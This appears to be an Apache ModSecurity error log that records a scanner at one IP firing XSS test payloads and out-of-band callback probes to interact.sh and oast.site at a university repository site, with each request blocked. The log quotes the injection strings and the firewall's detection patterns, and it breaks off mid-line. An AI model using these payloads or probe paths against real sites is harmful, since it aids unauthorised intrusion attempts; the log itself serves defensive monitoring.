[Tue Aug 29 11:51:50.691979 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnIlkQAAAAV"]
[Tue Aug 29 11:51:51.617573 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnmT4IAAAAd"]
[Tue Aug 29 11:51:52.530706 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15aMCo-f0AAAnIlk4AAAAV"]
[Tue Aug 29 11:51:53.923738 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAm80RIAAAAF"]
[Tue Aug 29 11:51:53.993287 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAn0GYgAAAAa"]
[Tue Aug 29 11:51:55.719973 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAm@504AAAAH"]
[Tue Aug 29 11:51:55.820246 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAfWOJgAAAAL"]
[Tue Aug 29 11:51:56.588990 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAnIll4AAAAV"]
[Tue Aug 29 11:51:57.565453 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAm80RsAAAAF"]
[Tue Aug 29 11:51:58.578332 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAlUlnwAAAA0"]
[Tue Aug 29 11:51:59.569001 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnh6OcAAAAS"]
[Tue Aug 29 11:51:59.569643 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAn40x0AAAAW"]
[Tue Aug 29 11:52:01.577427 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAhoHTAAAAAl"]
[Tue Aug 29 11:52:02.625619 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnh6O0AAAAS"]
[Tue Aug 29 11:52:02.658551 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAn40yMAAAAW"]
[Tue Aug 29 11:52:02.824880 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO15csCo-f0AAAjdQZcAAAAZ"]
[Tue Aug 29 11:52:02.844464 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15csCo-f0AAAhoHTYAAAAl"]
[Tue Aug 29 11:52:04.906366 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnIlnQAAAAV"]
[Tue Aug 29 11:52:04.909233 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0i5htf5o99ss5c.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0i5htf5o99ss5c.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAoAkt8AAAAC"]
[Tue Aug 29 11:52:06.561138 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAlUlpAAAAA0"]
[Tue Aug 29 11:52:06.566485 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dsCo-f0AAAm7nFkAAAAE"]
[Tue Aug 29 11:52:06.608069 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAn9594AAAAD"]
[Tue Aug 29 11:52:08.595514 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15eMCo-f0AAAn0Ga4AAAAa"]
[Tue Aug 29 11:52:08.656130 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fill. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fill: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/checklist/images/checklist-icon.php"] [unique_id "ZO15eMCo-f0AAAoCWEUAAAAB"]
[Tue Aug 29 11:52:09.668072 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15ecCo-f0AAAoAku4AAAAC"]
[Tue Aug 29 11:52:09.712245 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: domain)>11 found within ARGS:email: test@test.com\\x22><img src=a onerror=alert(document.domain)>11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/seo/seopanel/login.php"] [unique_id "ZO15ecCo-f0AAAlUlpcAAAA0"]
[Tue Aug 29 11:52:10.699032 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15esCo-f0AAAnn2BAAAAAe"]
[Tue Aug 29 11:52:11.709268 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15e8Co-f0AAAfWOMEAAAAL"]
[Tue Aug 29 11:52:11.733114 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] 